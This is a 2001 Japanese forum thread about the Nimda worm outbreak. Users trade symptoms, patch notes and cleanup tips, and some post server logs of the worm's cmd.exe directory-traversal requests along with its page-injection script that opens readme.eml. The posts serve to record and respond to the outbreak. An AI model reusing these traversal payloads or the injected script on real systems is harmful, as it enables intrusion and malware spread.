1 :
名無しさん@お腹いっぱい。 :
01/09/19 00:11
2 :
名無しさん@お腹いっぱい。 :01/09/19 00:13
3 :
名無しさん@お腹いっぱい。 :01/09/19 00:21
おいおい、古い穴狙ってるな
emlから直接Base64の部分抜き出してデコードしてみたけど、
なんでこのファイル、こんなアイコンなんだ。
つーか普通にレスしちゃったけど、
>>3 のリンクはIEにパッチ
当ててない奴はまずいだろ。
6 :
名無しさん@お腹いっぱい。 :01/09/19 00:31
>>5 あ、ごめん。ネスケなので気が付かなかったー。
7 :
名無しさん@お腹いっぱい。 :01/09/19 00:32
ついでにバイナリエディタで覗いて見たけど、こいつも Admin.dllとか言ってるな。最近はさすがにCodeRedスレ 見てなかったから知らんけど、そこらへんの新種が関係 してんのかね
9 :
名無しさん@お腹いっぱい。 :01/09/19 00:35
MIMEのデコードが上手くいかない(;´Д`) readme.exeのみのヘッダ教えてチョ
ということで、CodeRedスレの人間に聞いた方が早そうだな。寝よ
11 :
名無しさん@お腹いっぱい。 :01/09/19 00:36
13 :
名無しさん@お腹いっぱい。 :01/09/19 00:39
>>12 -13
RarUty使ってるのだが、base64として認識してくれない(;´Д`)
寝ようと思ったけどまだ1時にもなってないのか。 見直してみたけど、やっぱりtftpとかも書いてあるわ。
128 名前: 投稿日:01/09/19 00:40 ID:KLLLh/gg 突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;
>>17 実行したんかい(w
それにしても、「不正なMIMEヘッダを含む〜」とCodeRedの
合作かな。なんか面白みないね
19 :
名無しさん@お腹いっぱい。 :01/09/19 00:45
ワシもバイナリ観察ちゅう。いろいろ手が込んでますな。
しかし
>>17 のように実行は出来ないw
新種ウイルスという話になってる<ニュース速報
21 :
名無しさん@お腹いっぱい。 :01/09/19 00:47
やっぱ、ここで、話題になってましたか・・・・ 実は、実行しちゃいました>< readme.exeですが、 concept virs (CV) v5 って文字列が含まれてます。(TT) concept virsをちょっと、調べてみたのですが、 英語版wordに感染するマクロウィルスらしいです。
ああ、VMwareのバーチャルマシン上で実行しようとしたら、 何日か前に消しちまったんだった。残念。まあ挙動はバイナリ みるだけでほとんど書いてあるような気もするが。
21です。 ニュース速報って、どこの、ニュース速報?>20
>>23 あ、ややこしい書き方でスマソ、ココ(2ch)です。
対策されたみたいです、もう開きません
ん?ちと待てよ。これって今度は無差別にこのemlを 送信するわけか?だとしたらトラフィックがまた・・・。 一個76.6KBのファイルをガンガン送られたらかなわんな
27 :
名無しさん@お腹いっぱい。 :01/09/19 00:53
28 :
名無しさん@お腹いっぱい。 :01/09/19 00:54
>>27 ネットワークの方はどうなってる?パケット送りまくり?
29 :
名無しさん@お腹いっぱい。 :01/09/19 00:55
>>28 Librettoとラブコールしまくりだった。
30 :
名無しさん@お腹いっぱい。 :01/09/19 00:57
>>29 そうか、じゃあ後は自分で解析するのも面倒っつーか
意味ないからCodeRedスレのログでも読むかな。
32 :
名無しさん@お腹いっぱい。 :01/09/19 00:58
33 :
名無しさん@お腹いっぱい。 :01/09/19 01:05
過去ログ読んできたけどまだそれほど情報でてないな。 1のスレも読んでみたけど、メディアプレイヤーが立ち上がる? 「不正なMIMEヘッダ〜」に加えて、「MediaPlayerのスキンファイル〜」 の穴も突こうとしてんのかね。出遅れたからわからん。 CodeRedスレの人間教えれ
34 :
名無しさん@お腹いっぱい。 :01/09/19 01:06
nimda?
37 :
名無しさん@お腹いっぱい。 :01/09/19 01:10
今日は夜から、なんかネットが重いなって思ってたけど、 こいつがでかいファイルを撒き散らしてたわけね
38 :
名無しさん@お腹いっぱい。 :01/09/19 01:13
>>35 サンクス、ざっと読んできた。また祭りか?とか思ってたけど、
洒落にならん・・・16種類。しかも良く考えたら「不正なMIME〜」は
IEだけじゃなく、OutLookもか・・・
39 :
名無しさん@お腹いっぱい。 :01/09/19 01:13
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China って書いてあるよ?
40 :
名無しさん@お腹いっぱい。 :01/09/19 01:15
でかいって言っても高々79261バイトじゃないのw
41 :
名無しさん@お腹いっぱい。 :01/09/19 01:18
>>40 無差別に撒き散らすとしたら十分すぎるほどでかい
すまん。鬱だ寝よう。
44 :
名無しさん@お腹いっぱい。 :01/09/19 01:22
>>43 まぁまぁ、ドンマイドンマイ
それにしても、こんどのコードネームは Nimda か
45 :
名無しさん@お腹いっぱい。 :01/09/19 01:26
つーかドンマイ言ってる場合じゃなかった。またも ARP Floodが〜。1分にARPだけで1025パケット・・・
46 :
名無しさん@お腹いっぱい。 :01/09/19 01:27
readme.exeを実行して、ブルーなので寝ます。 はぁ〜
47 :
名無しさん@お腹いっぱい。 :01/09/19 01:33
実行したらexplorer.exeが落ちてワトソン博士が反応した メモリリフレッシュするには便利なアイテムだよ
48 :
名無しさん@お腹いっぱい。 :01/09/19 01:38
ワラタ しかし笑い事じゃない。どうでもいいけどこのreadme.exe、 リソース覗いてみたらアイコンが5つ。・・・意味ないぞ とりあえず今回もJ-COM内からのアタックがガンガン来てる 上にARPの数はさらに増えつつある。とりあえずJ-COMに メール出しとくか。
49 :
名無しさん@お腹いっぱい。 :01/09/19 02:12
50 :
名無しさん@お腹いっぱい。 :01/09/19 04:43
51 :
名無しさん@お腹○っぱい :01/09/19 04:52
しゃれにならんねえ ワショ-イ
52 :
名無しさん@お腹いっぱい。 :01/09/19 06:02
ワケ ワカ ラン
54 :
名無しさん@お腹いっぱい。 :01/09/19 06:54
55 :
名無しさん@お腹いっぱい。 :01/09/19 06:57
>>54 Nimdaは、先週起こったテロとは関係ないっちゅーことやろ
56 :
名無しさん@お腹いっぱい。 :01/09/19 07:11
シマンテックの解析が進んでるねぇ。凄い凄い。 がんばれしまんてくー。
58 :
名無しさん@お腹いっぱい。 :01/09/19 07:28
これってさぁ、「ウチはApache for Winだから関係ないもーん」とか 思ってても、メールから感染したら、やっぱwebページが改竄されるのかなぁ。
>>58 感染したPC側はサーバーへのアタックもやるのかな。
それによると思う。
同じウィルスの感染手段が異なるだけのものだとすれば、
Webも改竄されるのでは。
60 :
ヤバイんじゃないの、、 :01/09/19 08:23
複数の感染方法を持ってるのかよ。
62 :
名無しさん@お腹いっぱい。 :01/09/19 09:12
Windowsファイル保護っていう画面が出て Windowsを正しく動作するための必要なファイルが認識できない バージョンのファイルに置き換えられています。システムの 安定を維持するために、これらのファイルを元のバージョンに 復元する必要があります。 Wndows2000 Professional CD-ROMを挿入してください。 ってなるんだけど、ただCDを入れれば勝手に処理してくれるのんですか?
Un Installなんとか Map.... っていうお知らせ画面がでてきました。
駆除方法が確立されるまで、手出さないほうがいいんじゃない?
66 :
名無しさん@お腹いっぱい。 :01/09/19 09:22
あー、あんなの見てなくてよかった。 オレ、msnなんて昔から見たことないから・・・・・ あの錆、めちゃ遅いからね。 いまだに、立ち上げと同時にmsnが表示されたままの人が 多いようだし・・・・
67 :
名無しさん@お腹いっぱい。 :01/09/19 09:24
>>63 いやいや。
しばらくすると、各社から修復方法が発表になると思うので、
それまでは、予備のPCでやっていた方がいいと思う。
静かです、、すごく静かになりました。。。。 なんだかPCの中にとんでもない悪者が潜んでいそうでとてもコワイです。
69 :
名無しさん@お腹いっぱい。 :01/09/19 09:27
このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には 含まれてるよね?
IPアタック来てますか?
まだ駆除方法は出てないわけだ? ひっかっかっちゃったよヽ(´ー`)ノ 実害出てないけどね。。 そのうちファイルあぼられたりするのかなあ?
72 :
名無しさん@お腹いっぱい。 :01/09/19 09:38
そうそう、各フォルダに009.emlとかいうファイルがいっぱいできてた。 デスクトプンだけじゃなかったみたい(´Д`)
どんな解説見てる?
これってアメリカの報復ハカーと関係あるのかなぁ?
ラウンジにサイト貼られてたから開けちゃったよヽ(;´ー`)ノ ファイルのバックアップとっといた方がいいかな?
うちやられちゃったよ・・・。
http://mimizun.mine.nu/ ハードディスクいっぱいにしてくれました。一応、*.emlと*.tmp.exeを削除しました。
でもなぁNTsp6aのIISでSRPあてていたんだが・・・
もしかしたらファイル消されたかもしれない。C:\のファイルが。。
気のせいかもしれないけどね。あと.eml消せなくなってるよ??
>>77 ご愁傷様。。なんか実害あった?ファイル消されたりするのかなぁ?
意味ないんじゃないの??
ゴルァ、おれのサーバにアホみたいにきてるぞ。 CodeRedIIの比じゃないぐらいの割合で。
80 :
名無しさん@お腹いっぱい。 :01/09/19 10:02
>69 このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には 含まれてるよね IE6,0はどうなんでしょうか?
81 :
名無しさん@お腹いっぱい。 :01/09/19 10:06
新種ウイルス「Nimda」の感染拡大=米司法長官
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all 【シリコンバレー18日時事】「Nimda(ニムダ)」と呼ばれる危険度の高い新種の
コンピューターウイルスが登場し、ウイルス対策会社などが注意を呼び掛けている。
米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで届けられる添付
ファイル「readme.exe」に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。マイクロソフト製ウェブサーバー
ソフトを利用している他のコンピューターに対して同ソフトのセキュリティーホール
(欠陥)を狙った攻撃を仕掛ける。 (時事通信)[9月19日9時3分更新]
82 :
名無しさん@お腹いっぱい。 :01/09/19 10:08
>>80 確かめてみたら5.5SP2にはばっちり含まれてた。
悪いんだが6.0はわからん。でも対策されてない気がする
83 :
名無しさん@お腹いっぱい。 :01/09/19 10:08
84 :
名無しさん@お腹いっぱい。 :01/09/19 10:11
85 :
名無しさん@お腹いっぱい。 :01/09/19 10:12
>マイクロソフト製ウェブサーバーソフトを利用している他の ^^^^^^^^^^^^^^^^ >コンピューターに対して同ソフトのセキュリティーホール >(欠陥)を狙った攻撃を仕掛ける。(時事通信)[9月19日9時3分更新] ^^^^^^^^^ これって、損害賠償責任ないの?
86 :
名無しさん@お腹いっぱい。 :01/09/19 10:16
210.91.45.224 - - [19/Sep/2001:10:03:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233 210.91.45.224 - - [19/Sep/2001:10:03:50 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:03:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:04:05 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:04:10 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:04:16 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:04:23 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 210.91.45.224 - - [19/Sep/2001:10:04:30 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205 210.91.45.224 - - [19/Sep/2001:10:04:38 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205 HRS-MSG - - [19/Sep/2001:10:10:20 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233 HRS-MSG - - [19/Sep/2001:10:10:22 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:44 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:48 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:10:54 +0900] "GET /msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205 HRS-MSG - - [19/Sep/2001:10:10:58 +0900] "GET /scripts/..チ../winnt/system32/cmd.exe HTTP/1.0" 400 205 HRS-MSG - - [19/Sep/2001:10:11:01 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:11:03 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205 HRS-MSG - - [19/Sep/2001:10:11:06 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205 HRS-MSG - - [19/Sep/2001:10:11:09 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:11:11 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:11:14 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214 HRS-MSG - - [19/Sep/2001:10:11:20 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214 永遠に続く。重いわけだ。
87 :
名無しさん@お腹いっぱい。 :01/09/19 10:18
米軍がやっとんとちゃうか?
88 :
名無しさん@お腹いっぱい。 :01/09/19 10:23
感染したが、GoBackで昨日の午前中に戻したからたぶん大丈夫だろう。
>>82 ありがとうございます。
6.0から5.5にバージョンアップ?と思いつつIEのページからDLしようとしたら
最新バージョンがインストール済みでバージョンアップできませんですって。
こわいよー!
91 :
名無しさん@お腹いっぱい。 :01/09/19 10:26
えっと。感染したのでいろいろ見てみたけど ありとあらゆる実行ファイルにreadme.emlなる文字列が確認されたのでめんどいのでクリーンインストールします。。。 パッチあてめんどいんだよなぁ。
92 :
91のみみずん :01/09/19 10:27
えっと、
>>91 はIISのサーバーの場合です。普通に見ているだけでは問題ありません。
93 :
名無しさん@お腹いっぱい。 :01/09/19 10:32
>>91 GoBack入れとけば良かったのにな。
うちはGoBackで感染ファイルが根こそぎなくなったわ。よかったよかった。
おいおい、ニュース速報板に書き込むとアタックが来る。
>>90 6から5.5へは逝けません。6へは一方通行です。
96 :
名無しさん@お腹いっぱい。 :01/09/19 10:36
MSN復活しとるな。。。 お詫びも警告もないな。。。 やっぱりな。。。。
97 :
名無しさん@お腹いっぱい。 :01/09/19 10:37
98 :
名無しさん@お腹いっぱい。 :01/09/19 10:39
Lynxでiモードの方のページ見てたから気付かなかったけど、 ここのトップにNimdaの警告が貼ってあるね。気が利くな。 ちなみに「見ただけで感染」を防ぐだけじゃなく、パッチ当てた ならメール経由でも防げるはず。まあまだメールで来た人はいない みたいだけど。
101 :
名無しさん@お腹いっぱい。 :01/09/19 10:45
>>94 あそこは、アクセスするだけでロクを取られているし、
そのログをハッキングしているやつがいるから要注意。
ニュース速報板に誰か書き込んでみた? アタック来るよね?俺だけ?
103 :
名無しさん@お腹いっぱい。 :01/09/19 10:46
どれ、試しに書きこんでみるか。黒氷でもアタック見える?
104 :
名無しさん@お腹いっぱい。 :01/09/19 10:49
>>102 そうだよ。
あそこ、絶対にログが漏れているよ。
105 :
名無しさん@お腹いっぱい。 :01/09/19 10:50
emlファイルってどうやって消せばいいの? 2300個もあったよ。。。 右クリックで消そうとすると ファイルを削除できません。送り側のファイルまたはディスクから読みとれません。 っていわれるし。 消せるファイルは削除するとなんか実行されてるみたいだし。。。 マジで恐いよ!!
The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 4103) [TCP Flags: S]. The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 4105) [TCP Flags: S]. とうとう、ここもだよ。
おいおい、早くワクチン作ってくれぇヽ(;´Д`)ノ
109 :
名無しさん@お腹いっぱい。 :01/09/19 10:57
>>106 うちはけせたけど。。。NT ServerSP6a+SRP
f: del *.eml でいいですか?
112 :
名無しさん@お腹いっぱい。 :01/09/19 11:01
113 :
名無しさん@お腹いっぱい。 :01/09/19 11:05
>>106 ファイルの検索で期間を指定して当格ファイルを選び出して削除。
DEL F:*.eml
ファイルの検索でひっかかったemlファイルを右クリックで 削除しようとすると警告ばってんがつくんですよ。。。
116 :
名無しさん@お腹いっぱい。 :01/09/19 11:08
>>114 それだと友達から来て保存しているメールも削除されちゃうかもよ。
見つけたemlファイルを軽く一回クリックしただけでも ファイルのダウンロードが始まるんですね。。。。 どうしよう。。。
119 :
名無しさん@お腹いっぱい。 :01/09/19 11:39
emlファイルってどうやって検索するんですか? HDD感染したっぽいんですけど
121 :
名無しさん@お腹いっぱい。 :01/09/19 11:50
誰かNimda専用スレ立ててくださいませ。こいつは酷い。 Apacheのログが2分間隔くらいで GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0 みたいなのばっかり、ログ見た時ぞっとしたよ。
cmd.exe ってウイルスですか?>121
<html><body bgcolor=black><br><br><br><br><br><br>
<table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:
[email protected] </html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
124 :
名無しさん@お腹いっぱい。 :01/09/19 12:00
>>122 コマンドプロンプトです。ファイ名を指定して実行で試してみれば
わかりますが。
ファイ名X ファイル名。鬱。
ところで、こいつってIEコンポーネントブラウザ(cuamとか)ってどーなんだろ?
パッチ当ててなければ食らうだろうね。 メーラーも、IEコンポーネント使ってるやつなら危険
ニダスレぎぼーん 情報がなくって困ってます。 いまIISをスキャンしているのは、いけないページを見てしまった クライアントという事でいいですか? アパッチのhttpドキュメントをSAMBAで共有してたら、やられちゃうん でしょうか?defaunt.htmlだけが対象ならいいんだけど、index.htmlも 書き換えられるんだったら、自宅のもやばい・・・嫁のPCはSPなんて あててないもん
129 :
名無しさん@お腹いっぱい。 :01/09/19 12:40
130 :
名無しさん@お腹いっぱい。 :01/09/19 12:45
IE5.00ってやばいすか? SP2って書いてあるんすけど
132 :
名無しさん@お腹いっぱい。 :01/09/19 13:41
お粗末msn さらしあげ。
133 :
こんな感じ :01/09/19 15:45
2001/09/18(23:15:46) W-SV 211.125.194.55 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0" 2001/09/18(23:15:49) W-SV 211.170.249.153 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:15:54) W-SV 211.170.249.153 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:15:57) W-SV 211.125.194.55 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:15:58) W-SV 211.125.194.55 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:00) W-SV 211.170.249.153 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:00) W-SV 211.125.194.55 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:03) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..チ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:05) W-SV 211.170.249.153 [80] 404 281 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:13) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..タ/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 2001/09/18(23:16:14) W-SV 211.170.249.153 [80] 404 281 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 昨晩から、ずっと・・・・・・・・・
134 :
MSN広報部 :01/09/19 19:33
http://help.msn.co.jp/notice.htm ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。
A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。
135 :
名無しさん@お腹いっぱい。 :01/09/19 19:35
普段寛容な俺もMSNのこのコメントには殺意を覚えた。 とくに「〜ないと考えています。」ってところ。
136 :
三遊亭・з・)) ◆dABRuhdE :01/09/19 19:36
ってーか、パッチ配布してる大元が、、、何でその穴使ったウイルスに 感染するかね。。。my糞。
138 :
名無しさん@お腹いっぱい。 :01/09/20 00:10
やっぱ。カネの亡者の会社だけあるな。
139 :
名無しさん@お腹いっぱい。 :01/09/20 09:21
どうしてみんなは 「Windowsが欠陥品である」 と言うことに気がつかない? 見ただけで勝手に何かを実行するなんて言う構造は 根本的に間違い。 こんな基地外であるMicro$oftは、早く潰れて下さい。 1番悪いのは、ビルゲイツです。 商売以外にももうちょっと頭使って下さい(藁 で2番目にに悪いのが、ウィルス作成者。 いくらWindowsがショボイと言っても、 そんなことやってはいけません。 3番目に悪いのは、それに気がつかずM$製品を使う 厨房ユーザー 感染したmsnは、もちろん消防(ププププ
140 :
さわだけんじ :01/09/20 09:56
>>139 いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
…
141 :
名無しさん@お腹いっぱい。 :01/09/20 09:58
コピペ厨ウザイ
>>139 自分で工夫したり探求する能力がないんだよ、
「周りが使っているから」と言うだけでそれ以上の
判断止めちゃう奴が多いからね。
大丈夫、たとえ欠陥有っても気がつかないから。
要するにMSの問題じゃなくてユーザーの問題。
便利な部分だけ受け取って面倒な部分は他人任
せにしたり目を背け続けた結果だよ。こういう
人たちはどんなOS使っても同じね。
143 :
名無しさん@お腹いっぱい。 :01/09/20 10:17
>>142 周りが使ってるからというより、あらゆるソフトが手に入りやすいから
ってのが主な理由でしょ。
144 :
名無しさん@お腹いっぱい。 :01/09/20 10:21
始めっから入ってるからだろう,ソフトがどうかなんて考えて 無い奴が多いと思うが
すぐに穴空いたり、変なスクリプトやウイルス出てきて 飽きないよ。WIN。 パッチ当てて安心するだけじゃなく、そのバグ突いた不 正スクリプト探し当てるのも楽しいし。 ただ、そのバグ発見した本人が公開前にMSに警告したに も関わらず、パッチ出なくて業を煮やして公開に踏み切 ってるのは企業態度として頂けない。
146 :
名無しさん@お腹いっぱい。 :01/09/20 10:35
>>142 excel と word を使ってるだけだろ,ほとんどの奴は
147 :
名無しさん@お腹いっぱい。 :01/09/20 10:37
いままでにIEから重要なエラーとか言うので、その事を管理側に教えた事ある人います? これでこのエラーでたの2度目なんだけど、送信しなかった。
Outlookのプレビュー機能だけは即刻廃止させた方がいいだろうな
>>142 UNIXとかならそういう主張も説得力あるけど、
WINDOWSは知識持ってる奴だけが使う物じゃないからね・・・
XP祭りなんかやってる場合かM$
150 :
名無しさん@お腹いっぱい。 :01/09/20 17:10
>>142 いま「IT講習」とかいって、60歳過ぎたじーちゃんばーちゃん
だってOUTLOOKやIE使ってネットしているよ。っていうか、
それ以外の方法を知らない。
アップグレードの仕方は教えているのかな。心配。
>>150 アップグレードなんか教えてないね。
使うだけでせーいっぱいなのに、どーやって教えるんだ?
使えればいいのであって、それ以上のことは学ぼうとしないよ。
ジジババだけじゃなく、たいていのWinユーザーがそうだと思うよ。
痛い目に会わないとわからないんだよ。
感染しててもわからないに、1000000ペリカ。
おれも10年以上の昔にブートセクターウィルスにやられてから、いろいろと学んだよ。
「転んでも泣かない!」
>>150 そういえばPCショップで老夫婦がシンクパッド持ってきて
店員に「ああ、これなら再インストールで直りますよ」と
あっさり言われて「さい・・・なんとか?」とつぶやいて
立ち尽くしていたのを思い出す。
インターネットボタンとかテレビ録画だとかいかにも簡単
そうに宣伝しておいてリカバリーになったとたんDOS画面
だもんな。そんなんだったら「バックアップボタン」とか
「再インストール」ボタンでも付けた方がユーザー喜ぶよね。
153 :
名無しさん@お腹いっぱい。 :01/09/20 21:29
IEの方から「重要なエラー」とかいうダイアログが出たんですけど、なに? 出た人いますか?
>>153 出た出た。
それ、送信しないほうがいい。
MSに情報もっていかれる。
155 :
名無しさん@お腹いっぱい。 :01/09/20 21:56
>>154 さん
送信しちゃったよ。。。
どうなるのかな?
俺のPCなんてろくなものは言ってないのに。。。
156 :
初心者な人 :01/09/21 00:17
申し訳ありません、ここで言うMSとは何でしょか?
>>156 ネタだよな?
しかしWINは大変だな。LINUX厨房の俺には関係ないが
158 :
156です :01/09/21 00:29
すみません、正気なんです。あわわわわぁ・・・
160 :
野次馬バカ :01/09/21 01:04
確かおとといの夜だったかな・・・? ここで『MSNがウィルスばら撒いてる』っての見て、 好奇心で見に行ってしまった・・・バカだ。 幸いにも『ページが表示できません』で繋がらなか ったみたいだが・・・今考えるとぞっとする。
161 :
156です :01/09/21 01:09
>>159 M$・・・・・
・・・・・・・すみません、厨房です。
初心者板逝って来ます。
162 :
野次馬で感染したら自業自得か? :01/09/21 01:09
漏れもそう。 ニュースサイトで知って、ホントかよ・・・ と思って2ちゃんで知ったアドレスにレッツアクセス! 昨日から大惨事。 自業自得か・・・・
>>161 マイクロソフト以外に何があるってんだ?
164 :
名無しさん@お腹いっぱい。 :01/09/21 01:13
166 :
156です :01/09/21 01:18
>>163 マイクロソフト・・・うわぁ、アホだ俺・・・。
ご迷惑おかけしました、やっぱ逝ってきます。
167 :
名無しさん@お腹いっぱい。 :01/09/21 10:25
騙されてるよ、モビールスーツに決まってるジャン みんな初心者をもてあそんじゃ可哀相だよ。
168 :
名無しさん@お腹いっぱい。 :01/09/21 13:25
いやいや。 msとは、マンコ・セクースのことだよ。
www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:38 2001 error File does not exist: /home/httpd/htdocs/c/winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:40 2001 error File does not exist: /home/httpd/htdocs/d/winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:42 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:44 2001 error File does not exist: /home/httpd/htdocs/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:47 2001 error File does not exist: /home/httpd/htdocs/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:52 2001 error File does not exist: /home/httpd/htdocs/msadc/..%5c../..%5c../..%5c/..チ../..チ../..チ../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:54 2001 error File does not exist: /home/httpd/htdocs/scripts/..チ../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:41:58 2001 error File does not exist: /home/httpd/htdocs/scripts/..タッ../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:42:01 2001 error File does not exist: /home/httpd/htdocs/scripts/..チ・./winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:42:10 2001 error File does not exist: /home/httpd/htdocs/scripts/..%5c../winnt/system32/cmd.exe www.hnmc.edu.cn. 211.67.232.4 Fri Sep 21 19:42:16 2001 error File does not exist: /home/httpd/htdocs/scripts/..%2f../winnt/system32/cmd.exe
きまりきったアプリしか使わなくてアップデートもさほど必要じゃないってユーザ層に システムやアプリはCD-ROM みたいな書きこみ不可能な媒体で動かす マシン発売すりゃいいんだよ。 昔のワープロ専用機みたいに。 クラッシュの心配はほぼないし、ウイルス汚染もかなり減るだろ。 取り扱い簡単になるはず。
昔、それに似たようなパソコンが売られてたような、、 どうなんたんだろう? 確か勝手にパソコンがアップデートしてくれるマシン。 ユーザーは何もしなくてよかったと思う
174 :
名無しさん@お腹いっぱい。 :01/09/22 00:00
トレンドマイクロのサイトに行って オンラインで探したところ(無料) 7つの感染ファイルがみつかりました。 MSNのホームページから勝手にダウンロードされた 圧縮ファイルのようです。 削除したけど・・・もう大丈夫かな?
>>172 あはは!そりゃ良いや。メール、ブラウザ、オフィス、年賀状
位しか使ってないんだからな。
176 :
名無しさん@お腹いっぱい。 :01/09/22 10:32
177 :
回線さえ速けりゃ :01/09/22 12:03
PCにOS未搭載する。 BIOSがネット機能持て。boot時に選択メニュー(もちろんお気に入りのOS群) がでる。ネットからOSを見つけてbootする。メーカーのServerでもいいし、その辺のユーザーPCの読込済みのでもいいじゃん。 OS部分は共有化だな。NapsterやWINMXみたいにさ。ついでにアプリも共有しちゃえ。 もはやHDDは自前のデータだけになり、寂しい俺としては40MBディスク復活希望。
178 :
回線さえ速けりゃ2 :01/09/22 12:04
ISPが10メガ用意しているので、お前はディスクも要らぬと 後ろから声がした。
179 :
名無しさん@お腹いっぱい。 :01/09/22 12:23
ようするにロムブート。
意訳してロンブー
181 :
名無しさん@お腹いっぱい。 :01/09/22 13:47
